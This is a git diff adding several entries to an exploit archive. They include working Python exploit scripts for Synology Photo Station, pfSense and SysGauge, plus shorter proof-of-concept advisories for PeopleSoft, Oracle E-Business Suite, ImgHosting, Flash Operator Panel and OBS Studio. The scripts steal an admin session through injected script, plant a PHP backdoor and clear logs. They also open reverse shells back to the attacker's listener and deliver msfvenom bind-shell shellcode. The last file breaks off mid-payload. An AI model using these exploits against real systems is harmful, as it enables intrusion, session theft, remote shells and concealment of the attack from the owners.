diff --git a/exploits/hardware/remote/43609.py b/exploits/hardware/remote/43609.py new file mode 100755 index 000000000..a18b04fe9 --- /dev/null +++ b/exploits/hardware/remote/43609.py @@ -0,0 +1,304 @@ +#!/usr/local/bin/python +""" +Synology Photo Station <= 6.8.2-3461 (latest) SYNOPHOTO_Flickr_MultiUpload Race Condition File Write Remote Code Execution Vulnerability +Found by: mr_me +Tested: 6.8.2-3461 (latest at the time) +Vendor Advisory: https://www.synology.com/en-global/support/security/Synology_SA_18_02 + +# Summary: +========== + +This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Synology Photo Station. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. +The specific flaw exists within the SYNOPHOTO_Flickr_MultiUpload function. When parsing the prog_id parameter, the process does not properly validate a user-supplied string before using it to execute a call to file_put_contents. An attacker can leverage this vulnerability to execute code under the context of the PhotoStation user. + +# Example: +========== + +saturn:synology mr_me$ ./sinology.py 192.168.100.9 en0 + + Synology Photo Station SYNOPHOTO_Flickr_MultiUpload Race Condition File Write Remote Code Execution Vulnerability + mr_me + +(+) waiting for the admin... +(+) stolen: qt4obchbqfss2ap9ct9nb1i534 +(+) updated the settings! +(+) wrote php code! +(+) attempting race condition... +(+) won the race! +(+) rce is proven! +(+) deleted the image and scrubbed the logs! +(+) starting handler on port 4444 +(+) connection from 192.168.100.9 +(+) pop thy shell! +id +uid=138862(PhotoStation) gid=138862(PhotoStation) groups=138862(PhotoStation) +""" + +import sys +import socket +import requests +import telnetlib +from threading import Thread +from base64 import b64encode as b64e +from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler + +try: + import netifaces as ni +except: + print "(-) try 'pip install netifaces'" + sys.exit(1) + +# haven't pwned yet +pwned = False + +class xss(BaseHTTPRequestHandler): + def log_message(self, format, *args): + return + def do_GET(self): + global s + + # incase the referer isn't set, its coming from someone else + try: + referer = self.headers.get('Referer') + except: + referer = "" + + # of course this isn't bullet proof, but its enough for a poc + if t in referer: + if "PHPSESSID" in self.path: + s = self.path.split("=")[1] + print "(+) stolen: %s" % s + pwned = True + self.send_response(200) + self.end_headers() + return + +def _build_bd(raw=False): + php = ".gif" + if raw == True: + return php + return "photo_2f_%s" % (php.encode("hex")) + +def we_can_set_settings(target, session): + uri = "http://%s/photo/admin/share_setting.php" % target + d = { + "action" : "set_setting", + "social_flickr" : "on", + "share_upload_orig" : "on" + } + c = { "PHPSESSID" : session } + r = requests.post(uri, data=d, cookies=c).json() + if "success" in r: + if r["success"] == True: + return True + return False + +def we_can_upload(target, session): + uri = "http://%s/photo/webapi/file.php" % (target) + p = { "SynoToken" : session } + c = { "PHPSESSID" : session } + + # valid gif, important + gif = "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x00" + gif += "\x00\x00\x21\xf9\x04\x01\x00\x00\x00\x00\x2c" + gif += "\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02" + f = { "original": ("si.gif", gif) } + d = { + "api": "SYNO.PhotoStation.File", + "method" : "uploadphoto", + "version" : 1, + "dest_folder_path": "", + "duplicate" : "rename", + "mtime": "1513540164787", + "filename" : _build_bd(True) + } + r = requests.post(uri, params=p, files=f, cookies=c, data=d).json() + if "success" in r: + if r["success"] == True: + return True + return False + +def race(target): + r = "" + while("done" not in r): + r = requests.get("http://%s/photo/pwn.php" % target).text + return True + +def we_won_race(target, session, racing_thread): + while(racing_thread.isAlive()): + uri = "http://%s/photo/SocialNetwork/flickr.php" % target + d = { + "prog_id" : "../../volume1/@appstore/PhotoStation/photo/pwn.php", + "action" : "multi_upload", + "token" : 1, + "secret" : "", + "photoList" : _build_bd() + } + c = { "PHPSESSID": session } + requests.post(uri, cookies=c, data=d) + return True + +def build_php_code(): + phpkode = (""" + @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);""") + phpkode += ("""$dis=@ini_get('disable_functions');""") + phpkode += ("""if(!empty($dis)){$dis=preg_replace('/[, ]+/', ',', $dis);$dis=explode(',', $dis);""") + phpkode += ("""$dis=array_map('trim', $dis);}else{$dis=array();} """) + phpkode += ("""if(!function_exists('LcNIcoB')){function LcNIcoB($c){ """) + phpkode += ("""global $dis;if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {$c=$c." 2>&1\\n";} """) + phpkode += ("""$imARhD='is_callable';$kqqI='in_array';""") + phpkode += ("""if($imARhD('popen')and!$kqqI('popen',$dis)){$fp=popen($c,'r');""") + phpkode += ("""$o=NULL;if(is_resource($fp)){while(!feof($fp)){ """) + phpkode += ("""$o.=fread($fp,1024);}}@pclose($fp);}else""") + phpkode += ("""if($imARhD('proc_open')and!$kqqI('proc_open',$dis)){ """) + phpkode += ("""$handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes); """) + phpkode += ("""$o=NULL;while(!feof($pipes[1])){$o.=fread($pipes[1],1024);} """) + phpkode += ("""@proc_close($handle);}else if($imARhD('system')and!$kqqI('system',$dis)){ """) + phpkode += ("""ob_start();system($c);$o=ob_get_contents();ob_end_clean(); """) + phpkode += ("""}else if($imARhD('passthru')and!$kqqI('passthru',$dis)){ob_start();passthru($c); """) + phpkode += ("""$o=ob_get_contents();ob_end_clean(); """) + phpkode += ("""}else if($imARhD('shell_exec')and!$kqqI('shell_exec',$dis)){ """) + phpkode += ("""$o=shell_exec($c);}else if($imARhD('exec')and!$kqqI('exec',$dis)){ """) + phpkode += ("""$o=array();exec($c,$o);$o=join(chr(10),$o).chr(10);}else{$o=0;}return $o;}} """) + phpkode += ("""$nofuncs='no exec functions'; """) + phpkode += ("""if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){ """) + phpkode += ("""$s=@fsockopen('tcp://%s','%d');while($c=fread($s,2048)){$out = ''; """ % (cb_host, cb_port)) + phpkode += ("""if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """) + phpkode += ("""}elseif (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit'){break;}else{ """) + phpkode += ("""$out=LcNIcoB(substr($c,0,-1));if($out===false){fwrite($s,$nofuncs); """) + phpkode += ("""break;}}fwrite($s,$out);}fclose($s);}else{ """) + phpkode += ("""$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);@socket_connect($s,'%s','%d'); """ % (cb_host, cb_port)) + phpkode += ("""@socket_write($s,"socket_create");while($c=@socket_read($s,2048)){ """) + phpkode += ("""$out = '';if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """) + phpkode += ("""} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { """) + phpkode += ("""break;}else{$out=LcNIcoB(substr($c,0,-1));if($out===false){ """) + phpkode += ("""@socket_write($s,$nofuncs);break;}}@socket_write($s,$out,strlen($out)); """) + phpkode += ("""}@socket_close($s);} """) + return phpkode + +def exec_code(target): + handlerthr = Thread(target=handler, args=(cb_port,)) + handlerthr.start() + we_can_exec_php(target, b64e(build_php_code())) + +def handler(lport): + print "(+) starting handler on port %d" % lport + t = telnetlib.Telnet() + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(("0.0.0.0", lport)) + s.listen(1) + conn, addr = s.accept() + print "(+) connection from %s" % addr[0] + t.sock = conn + print "(+) pop thy shell!" + t.interact() + +def we_can_exec_php(target, php): + h = { "SIN" : php } + r = requests.get("http://%s/photo/si.php" % target, headers=h) + if r.text == "pwn": + return True + return False + +def we_can_clean_up(target, session): + uri = "http://%s/photo/webapi/photo.php" % target + + d = { + "api": "SYNO.PhotoStation.Photo", + "method" : "delete", + "version" : 1, + "id" : _build_bd() + } + c = { "PHPSESSID" : session } + h = { "X-SYNO-TOKEN" : session } + r = requests.post(uri, cookies=c, data=d, headers=h).json() + if "success" in r: + if r["success"] == True: + return True + return False + +def banner(): + return """\n\tSynology Photo Station SYNOPHOTO_Flickr_MultiUpload Race Condition File Write Remote Code Execution Vulnerability\n\tmr_me\n""" + +def do_xss(target, ip): + j = "\">" % ip + d = { + "api" : "SYNO.PhotoStation.Auth", + "method" : "login", + "version" : 1, + "username" : j, + "password" : "WAT", + "enable_syno_token" : "true" + } + r = requests.post("http://%s/photo/webapi/auth.php" % target, data=d).json() + +def we_can_clear_logs(target, session): + c = { "PHPSESSID" : session } + p = { "SynoToken" : session } + d = { + "api": "SYNO.PhotoStation.PhotoLog", + "method" : "clear", + "version" : 1, + } + r = requests.post("http://%s/photo/webapi/log.php" % target, data=d, params=p, cookies=c).json() + if "success" in r: + if r["success"] == True: + return True + return False + +def start_pain_train(t, s): + if we_can_set_settings(t, s): + print "(+) updated the settings!" + if we_can_upload(t, s): + print "(+) wrote php code!" + print "(+) attempting race condition..." + r = Thread(target=race, args=(t,)) + r.start() + if we_won_race(t, s, r): + print "(+) won the race!" + if we_can_exec_php(t, b64e('`rm pwn.php`;echo "pwn";')): + print "(+) rce is proven!" + if we_can_clean_up(t, s) and we_can_clear_logs(t, s): + print "(+) deleted the image and scrubbed the logs!" + exec_code(t) + +def keep_running(): + if pwned == True: + return False + return True + +def main(): + print banner() + global cb_host, cb_port, s, t + if len(sys.argv) != 3: + print "(+) usage: %s " % sys.argv[0] + print "(+) eg: %s 192.168.100.9 en0" % sys.argv[0] + sys.exit(1) + + s = "" + t = sys.argv[1] + cb_port = 4444 + + try: + cb_host = ni.ifaddresses(sys.argv[2])[2][0]['addr'] + except: + print "(-) no ip address associated with that interface!" + sys.exit(1) + + do_xss(t, cb_host) + + try: + server = HTTPServer(('0.0.0.0', 9090), xss) + print '(+) waiting for the admin...' + while keep_running(): + server.handle_request() + + except KeyboardInterrupt: + print '(+) shutting down the web server' + server.socket.close() + + if s != "": + start_pain_train(t, s) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/java/webapps/43594.txt b/exploits/java/webapps/43594.txt new file mode 100644 index 000000000..c3f1ec30d --- /dev/null +++ b/exploits/java/webapps/43594.txt @@ -0,0 +1,57 @@ +# Exploit Title: RCE vulnerability in monitor service of PeopleSoft 8.54, 8.55, 8.56 +# Date: 30 Oct 2017 +# Exploit Author: Vahagn Vardanyan +# Vendor Homepage: Oracle +# Software Link: Oracle PeopleSoft +# Version: 8.54, 8.55, 8.56 +# Tested on: Windows, Linux +# CVE : CVE-2017-10366 https://github.com/vah13/OracleCVE/tree/master/CVE-2017-10366 + +The RCE vulnerability present in monitor service of PeopleSoft 8.54, 8.55, 8.56. + +POST /monitor/%SITE_NAME% HTTP/1.1 +Host: PeopleSoft:PORT +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) +Gecko/20100101 Firefox/51.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Connection: close +Cookie:a=aa + +§JAVA_SERIAL§ + +%SITE_NAME% - is a PeopleSoft "name" to get it you can use some information +disclosure or brute force. information for automation detection: + + 1. If monitor component deployed and you don't know %SITE_NAME% then + will get this type of error + +

Site name is not valid. Check your URL syntax and try again.

+ + + 1. If %SITE_NAME% is true then you will get this message + +PeopleSoft + +Ping Test for Monitor Servlet + +Ping successful. Site %SITE_NAME% is valid. + + + 1. If monitor don't deployed then you will get this message + +Error 404--Not Found + +From RFC 2068 Hypertext Transfer Protocol -- HTTP/1.1: + +10.4.5 404 Not Found + +The server has not found anything matching the Request-URI. No +indication is given of whether the condition is temporary or +permanent. + +If the server does not wish to make this information available to the +client, the status code 403 (Forbidden) can be used instead. The 410 +(Gone) status code SHOULD be used if the server knows, through some +internally configurable mechanism, that an old resource is permanently +unavailable and has no forwarding address. \ No newline at end of file diff --git a/exploits/jsp/webapps/43592.txt b/exploits/jsp/webapps/43592.txt new file mode 100644 index 000000000..8401c1585 --- /dev/null +++ b/exploits/jsp/webapps/43592.txt @@ -0,0 +1,21 @@ +# Exploit Title: Oracle E-Business suite Open Redirect +# Google Dork: inurl:OA_HTML/cabo/ +# Date: April 2017 +# Exploit Author: [author] +# Vendor Homepage: http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html +# Software Link: [download link if available] +# Version: Oracle E-Business Suite (REQUIRED) +# Tested on: [relevant os] +# CVE : CVE-2017-3528 + +The exploit can be leveraged for an open redirect using the following +exploit path: + +https://targetsite/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=/\example.com + +Oracle E-Business suite is vulnerable to an open redirect issue, +specifically the redirect parameter allows any domain to be supplied +and it will be rendered on the target's site. + +Note I was also credited for this CVE, see the Oracle +CPU(http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html) \ No newline at end of file diff --git a/exploits/php/webapps/43560.py b/exploits/php/webapps/43560.py new file mode 100755 index 000000000..5015c6659 --- /dev/null +++ b/exploits/php/webapps/43560.py @@ -0,0 +1,110 @@ +#!/usr/bin/env python3 + +# Exploit Title: pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection. +# Date: 2018-01-12 +# Exploit Author: absolomb +# Vendor Homepage: https://www.pfsense.org/ +# Software Link: https://atxfiles.pfsense.org/mirror/downloads/old/ +# Version: <=2.1.3 +# Tested on: FreeBSD 8.3-RELEASE-p16 +# CVE : CVE-2014-4688 + +import argparse +import requests +import urllib +import urllib3 +import collections + +''' +pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection. +This script will return a reverse shell on specified listener address and port. +Ensure you have started a listener to catch the shell before running! +''' + +parser = argparse.ArgumentParser() +parser.add_argument("--rhost", help = "Remote Host") +parser.add_argument('--lhost', help = 'Local Host listener') +parser.add_argument('--lport', help = 'Local Port listener') +parser.add_argument("--username", help = "pfsense Username") +parser.add_argument("--password", help = "pfsense Password") +args = parser.parse_args() + +rhost = args.rhost +lhost = args.lhost +lport = args.lport +username = args.username +password = args.password + + +# command to be converted into octal +command = """ +python -c 'import socket,subprocess,os; +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); +s.connect(("%s",%s)); +os.dup2(s.fileno(),0); +os.dup2(s.fileno(),1); +os.dup2(s.fileno(),2); +p=subprocess.call(["/bin/sh","-i"]);' +""" % (lhost, lport) + + +payload = "" + +# encode payload in octal +for char in command: + payload += ("\\" + oct(ord(char)).lstrip("0o")) + +login_url = 'https://' + rhost + '/index.php' +exploit_url = "https://" + rhost + "/status_rrd_graph_img.php?database=queues;"+"printf+" + "'" + payload + "'|sh" + +headers = [ + ('User-Agent','Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0'), + ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'), + ('Accept-Language', 'en-US,en;q=0.5'), + ('Referer',login_url), + ('Connection', 'close'), + ('Upgrade-Insecure-Requests', '1'), + ('Content-Type', 'application/x-www-form-urlencoded') +] + +# probably not necessary but did it anyways +headers = collections.OrderedDict(headers) + +# Disable insecure https connection warning +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +client = requests.session() + +# try to get the login page and grab the csrf token +try: + login_page = client.get(login_url, verify=False) + + index = login_page.text.find("csrfMagicToken") + csrf_token = login_page.text[index:index+128].split('"')[-1] + +except: + print("Could not connect to host!") + exit() + +# format login variables and data +if csrf_token: + print("CSRF token obtained") + login_data = [('__csrf_magic',csrf_token), ('usernamefld',username), ('passwordfld',password), ('login','Login') ] + login_data = collections.OrderedDict(login_data) + encoded_data = urllib.parse.urlencode(login_data) + +# POST login request with data, cookies and header + login_request = client.post(login_url, data=encoded_data, cookies=client.cookies, headers=headers) +else: + print("No CSRF token!") + exit() + +if login_request.status_code == 200: + print("Running exploit...") +# make GET request to vulnerable url with payload. Probably a better way to do this but if the request times out then most likely you have caught the shell + try: + exploit_request = client.get(exploit_url, cookies=client.cookies, headers=headers, timeout=5) + if exploit_request.status_code: + print("Error running exploit") + except: + print("Exploit completed") \ No newline at end of file diff --git a/exploits/php/webapps/43567.txt b/exploits/php/webapps/43567.txt new file mode 100644 index 000000000..98ad6a1b3 --- /dev/null +++ b/exploits/php/webapps/43567.txt @@ -0,0 +1,28 @@ +# Exploit Title: ImgHosting Image Storage System 1.5 - Cross-Site-Scripting +# Date: 12-01-2018 +# Exploit Author: Dennis Veninga +# Contact Author: d.veninga [at] networking4all.com +# Vendor Homepage: foxsash.com +# Version: 1.5 +# CVE-ID: CVE-2018-5479 + +ImgHosting – Image Storage System quick and easy image hosting without +registration. Service is ideal for fast and reliable placement of images +for forums, blogs and websites. Simple design, comfortable customers, +direct links to pictures. This hosting service that we do every day use. +Like thousands of other people. We do service to the people. + +ImgHosting 1.5 (According footer information) is vulnerable to XSS attacks. +The affected function is its search engine. Since there is an user/admin +login interface, it's possible for attackers to steal sessions of users and +thus admin(s). By sending users an infected URL, code will be executed. + +--------------------------- +--------------------------- +PoC: + +http://{TARGET}/?search="> + +3. Solution: + +https://www.ilias.de/docu/goto.php?target=lm_1719&client_id=docu + +4. References: + +https://nvd.nist.gov/vuln/detail/CVE-2018-5688 +https://www.ilias.de/docu/goto_docu_pg_75029_35.html \ No newline at end of file diff --git a/exploits/php/webapps/43600.txt b/exploits/php/webapps/43600.txt new file mode 100644 index 000000000..797e64422 --- /dev/null +++ b/exploits/php/webapps/43600.txt @@ -0,0 +1,179 @@ +Document Title: +=============== +Flash Operator Panel v2.31.03 - Command Execution Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1907 + + +Release Date: +============= +2018-01-08 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1907 + + +Common Vulnerability Scoring System: +==================================== +6.2 + + +Vulnerability Class: +==================== +Command Injection + + +Current Estimated Price: +======================== +2.000a! - 3.000a! + + +Product & Service Introduction: +=============================== +The most comprehensive and affordable reporting and realtime monitor package for AsteriskA(c) based Call Centers. +A new approach on getting CDR reports for your phone system, centered on the user and call direction. Top lists, +Usage pattern and real time view are included. This version works under any Linux flavor (i386, x86_64 and R-Pi3). +Versions 1.2, 1.4, 1.6, 1.8, 10, 11 and 12 with the manager interface enabled to asterisk. PHP 5 & MySQL 5: only +required for the visual phonebook, call history and recordings interface. + +(Copy of the Vendor Homepage: https://www.fop2.com/index.php ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered a remote command execution in the official Flash Operator Panel v2.31.03. + + +Vulnerability Disclosure Timeline: +================================== +2018-01-08: Non-Public Disclosure (Vulnerability Laboratory - Shared Customer Research Feed) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Nicolas Gudino (Asternic) +Product: Flash Operator Panel 2 - User Control Panel (Web-Application) CentOS 2.31.03, Debian 2.31.03 & RPI-ARM 2.30.03 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A command inject web vulnerability has been discovered in the official Flash Operator Panel v2.31.03 web-application. +The security vulnerability allows remote attackers to inject own system specific commands via web-application. + +The command inject web vulnerability is located in the the `command` path variable paramter of the `index.php` file. +Remote attackers with low privileged web-application user account roles are able to perform command requests via +callforward module. Thus allows an user account with restricted privileges to perform unauthorized command requests +to compromise the operator panel web-application. The request method to inject the malicious command to the index path +variable is GET. The attack is limited on exploitation to a restricted authenticated user account of the application. + +The security risk of the command injection is estimated as high with a cvss (common vulnerability scoring system) count of 6.2. +Exploitation of the command inject vulnerability requires a low privileged web-application user account and no user interaction. +Successful exploitation of the vulnerability results in web-application-, database management system or web-server -compromise. + +Request Method(s): +[+] GET + +Vulnerable Module(s): +[+] UCP - User Control Panel + +Vulnerable File(s): +[+] index.php + +Vulnerable Parameter(s): +[+] command + + +Proof of Concept (PoC): +======================= +The vulnerability can be exploited by remote attackers without user interaction and with low privileged user account. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + + +PoC: Exploitation +http://ucp-fop.localhost:8000/ucp/index.php?quietmode=1337&module=callforward&command=./&[Variable Command Inject Vulnerability!] + + +PoC: Vulnerable Source (command) +($_REQUEST['quietmode']) && $user !== false && !empty($user)) +(isset($_REQUEST['command']) && ($_REQUEST['command'] == 'login' +$_REQUEST['command'] == 'forgot' +$_REQUEST['command'] == 'reset'))) { +$m = !empty($_REQUEST['module']) ? $_REQUEST['module'] : null; +$ucp->Ajax->doRequest($m,$_REQUEST['command']); + +Note: The request can be performed by restricted user accounts of the user control panel for higher access privileges. +The main administrator can use the command parameter to attack the backend of the main administrator by the same method. +The callforward uses the command variable to execute which is the same method performed for basic restricted user accounts. + + +Reference(s): +http://ucp-fop.localhost:8000/ +http://ucp-fop.localhost:8000/ucp/ +http://ucp-fop.localhost:8000/ucp/index.php +http://ucp-fop.localhost:8000/ucp/index.php?quietmode=1337 +http://ucp-fop.localhost:8000/ucp/index.php?quietmode=1337&module=callforward +http://ucp-fop.localhost:8000/ucp/index.php?quietmode=1337&module=callforward&command + + +Solution - Fix & Patch: +======================= +The command injection web vulnerability can be patched by a secure approval of the command parameter in the index.php file GET method request. +Sanitize the command path variable and disallow the usage of special chars to prevent further command injection attacks. + + +Security Risk: +============== +The security risk of the command injection vulnerability via path variable in the web-application is estimated as high (CVSS 6.2). + + +Credits & Authors: +================== +Benjamin K.M. [bkm@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or +implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any +case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its +suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental +or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface +websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories +or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, +phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. + +Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab + +Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark +of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. + + Copyright A(c) 2018 | Vulnerability Laboratory - [Evolution Security GmbH]aC/ + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com \ No newline at end of file diff --git a/exploits/windows/dos/43596.py b/exploits/windows/dos/43596.py new file mode 100755 index 000000000..8799209a6 --- /dev/null +++ b/exploits/windows/dos/43596.py @@ -0,0 +1,32 @@ +author = ''' + + ############################################## + # Created: ScrR1pTK1dd13 # + # Name: Greg Priest # + # Mail: ScR1pTK1dd13.slammer@gmail.com # + ############################################## + +# Exploit Title: OBS-Studio-20.1.3 Local Buffer Overflow Zer0Day (SEH Based PoC) +# Date: 2018.01.15 +# Exploit Author: Greg Priest +# Version: OBS-Studio-20.1.3 +# Tested on: Windows7 x64 HUN/ENG Enterprise +# Software Download Link: https://obsproject.com/download + +''' + +bug = ''' +Vulnerable input field: +<1> Copy printed "AAAAA...." string to clipboard! +<2> Profile -> New +<3> Paste the string in the input then press Ok + +''' +junk = "A" * 459 +SEH = "BBBB" +nextSEH = "CCCC" +overflow = "D" * 19533 + +print author +print "String: ", junk + SEH + nextSEH + overflow +print bug \ No newline at end of file diff --git a/exploits/windows/remote/43588.py b/exploits/windows/remote/43588.py new file mode 100755 index 000000000..230aaafc3 --- /dev/null +++ b/exploits/windows/remote/43588.py @@ -0,0 +1,103 @@ +# Exploit Title: SysGauge Server 3.6.18 - Buffer Overflow +# Exploit Author: Ahmad Mahfouz +# Description: Sysgauge Server Unauthenticated Remote Buffer Overflow SEH +# Contact: http://twitter.com/eln1x +# Date: 12/01/2018 +# CVE: CVE-2018-5359 +# Version: 3.6.18 +# Tested on: Windows 7 x64 +# Software Link: hhttp://www.sysgauge.com/setups/sysgaugesrv_setup_v3.6.18.exe + + + +from struct import pack +from os import system +from sys import exit +from time import sleep +import socket + + + +port = 9221 +host = '192.168.72.231' + + +stage1 = "\x83\xc4\x7f" *16 # metasm > add esp,127 +stage1 += "\x83\xc4\x04"    # metasm > add esp,4 +stage1 +=  "\xff\xe4"       # metasm > jmp esp +# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=1337 -f py -b '\x02' + +buf =  "" +buf += "\xb8\x01\x69\xed\x6f\xdd\xc3\xd9\x74\x24\xf4\x5a\x31" +buf += "\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\x43\x67\x0f" +buf += "\x9a\xbf\x9f\x4d\x65\x3f\x60\x32\xef\xda\x51\x72\x8b" +buf += "\xaf\xc2\x42\xdf\xfd\xee\x29\x8d\x15\x64\x5f\x1a\x1a" +buf += "\xcd\xea\x7c\x15\xce\x47\xbc\x34\x4c\x9a\x91\x96\x6d" +buf += "\x55\xe4\xd7\xaa\x88\x05\x85\x63\xc6\xb8\x39\x07\x92" +buf += "\x00\xb2\x5b\x32\x01\x27\x2b\x35\x20\xf6\x27\x6c\xe2" +buf += "\xf9\xe4\x04\xab\xe1\xe9\x21\x65\x9a\xda\xde\x74\x4a" +buf += "\x13\x1e\xda\xb3\x9b\xed\x22\xf4\x1c\x0e\x51\x0c\x5f" +buf += "\xb3\x62\xcb\x1d\x6f\xe6\xcf\x86\xe4\x50\x2b\x36\x28" +buf += "\x06\xb8\x34\x85\x4c\xe6\x58\x18\x80\x9d\x65\x91\x27" +buf += "\x71\xec\xe1\x03\x55\xb4\xb2\x2a\xcc\x10\x14\x52\x0e" +buf += "\xfb\xc9\xf6\x45\x16\x1d\x8b\x04\x7f\xd2\xa6\xb6\x7f" +buf += "\x7c\xb0\xc5\x4d\x23\x6a\x41\xfe\xac\xb4\x96\x01\x87" +buf += "\x01\x08\xfc\x28\x72\x01\x3b\x7c\x22\x39\xea\xfd\xa9" +buf += "\xb9\x13\x28\x47\xb1\xb2\x83\x7a\x3c\x04\x74\x3b\xee" +buf += "\xed\x9e\xb4\xd1\x0e\xa1\x1e\x7a\xa6\x5c\xa1\x81\x0e" +buf += "\xe8\x47\xe3\x60\xbc\xd0\x9b\x42\x9b\xe8\x3c\xbc\xc9" +buf += "\x40\xaa\xf5\x1b\x56\xd5\x05\x0e\xf0\x41\x8e\x5d\xc4" +buf += "\x70\x91\x4b\x6c\xe5\x06\x01\xfd\x44\xb6\x16\xd4\x3e" +buf += "\x5b\x84\xb3\xbe\x12\xb5\x6b\xe9\x73\x0b\x62\x7f\x6e" +buf += "\x32\xdc\x9d\x73\xa2\x27\x25\xa8\x17\xa9\xa4\x3d\x23" +buf += "\x8d\xb6\xfb\xac\x89\xe2\x53\xfb\x47\x5c\x12\x55\x26" +buf += "\x36\xcc\x0a\xe0\xde\x89\x60\x33\x98\x95\xac\xc5\x44" +buf += "\x27\x19\x90\x7b\x88\xcd\x14\x04\xf4\x6d\xda\xdf\xbc" +buf += "\x9e\x91\x7d\x94\x36\x7c\x14\xa4\x5a\x7f\xc3\xeb\x62" +buf += "\xfc\xe1\x93\x90\x1c\x80\x96\xdd\x9a\x79\xeb\x4e\x4f" +buf += "\x7d\x58\x6e\x5a" + +shellcode = buf + +payload = 'A' * 124             #offset +payload +=  '\xeb\x12\x90\x90'  #jmp over seh retrun value +payload += '\x3b\x38\x01\x10' * 4   # 0x1001383b : pop edi # pop esi # ret 0x04 | ascii {PAGE_EXECUTE_READ} [libdsm.dll] +payload += stage1 +payload +=  '\x90' * (1000 - len(payload) - len(shellcode)) +payload += shellcode + + + +header = '\x75\x19\xba\xab' +header += '\x03\x00\x00\x00' +header += '\x00\x40\x00\x00' +header += pack(' add esp,127 +stage1 += "\x83\xc4\x04"    # metasm > add esp,4 +stage1 +=  "\xff\xe4"       # metasm > jmp esp +# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=1337 -f py -b '\x02' + +buf =  "\x90" * 10 +buf += "\xb8\x01\x69\xed\x6f\xdd\xc3\xd9\x74\x24\xf4\x5a\x31" +buf += "\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\x43\x67\x0f" +buf += "\x9a\xbf\x9f\x4d\x65\x3f\x60\x32\xef\xda\x51\x72\x8b" +buf += "\xaf\xc2\x42\xdf\xfd\xee\x29\x8d\x15\x64\x5f\x1a\x1a" +buf += "\xcd\xea\x7c\x15\xce\x47\xbc\x34\x4c\x9a\x91\x96\x6d" +buf += "\x55\xe4\xd7\xaa\x88\x05\x85\x63\xc6\xb8\x39\x07\x92" +buf += "\x00\xb2\x5b\x32\x01\x27\x2b\x35\x20\xf6\x27\x6c\xe2" +buf += "\xf9\xe4\x04\xab\xe1\xe9\x21\x65\x9a\xda\xde\x74\x4a" +buf += "\x13\x1e\xda\xb3\x9b\xed\x22\xf4\x1c\x0e\x51\x0c\x5f" +buf += "\xb3\x62\xcb\x1d\x6f\xe6\xcf\x86\xe4\x50\x2b\x36\x28" +buf += "\x06\xb8\x34\x85\x4c\xe6\x58\x18\x80\x9d\x65\x91\x27" +buf += "\x71\xec\xe1\x03\x55\xb4\xb2\x2a\xcc\x10\x14\x52\x0e" +buf += "\xfb\xc9\xf6\x45\x16\x1d\x8b\x04\x7f\xd2\xa6\xb6\x7f" +buf += 